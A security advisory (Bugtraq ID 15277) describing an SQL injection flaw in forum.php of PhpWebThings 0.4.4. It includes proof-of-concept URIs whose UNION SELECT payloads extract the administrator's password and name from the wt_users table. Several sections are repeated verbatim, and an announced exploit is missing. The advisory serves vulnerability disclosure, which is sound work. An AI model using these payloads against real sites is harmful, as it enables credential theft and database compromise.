PHPWebThing Forum.PHP SQL Injection Vulnerability
BID:15277
Info
PHPWebThing Forum.PHP SQL Injection Vulnerability
| Bugtraq ID: | 15277 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 02 2005 12:00AM |
| Updated: | Nov 02 2005 12:00AM |
| Credit: | Linux_Drox is credited with the discovery of this vulnerability. |
| Vulnerable: |
PhpWebThings PhpWebThings 0.4.4 |
| Not Vulnerable: | |
Discussion
PHPWebThing Forum.PHP SQL Injection Vulnerability
phpWebThing is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
phpWebThing is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
PHPWebThing Forum.PHP SQL Injection Vulnerability
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/forum.php?forum=-1 union select password,password,null,null,null,null from wt_users where uid=1/*
http://www.example.com/forum.php?forum=-1 union select name,name,null,null,null,null from wt_users where uid=1/*
The following proof of concept exploit by AhLaM is available:
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/forum.php?forum=-1 union select password,password,null,null,null,null from wt_users where uid=1/*
http://www.example.com/forum.php?forum=-1 union select name,name,null,null,null,null from wt_users where uid=1/*
The following proof of concept exploit by AhLaM is available:
Solution / Fix
PHPWebThing Forum.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.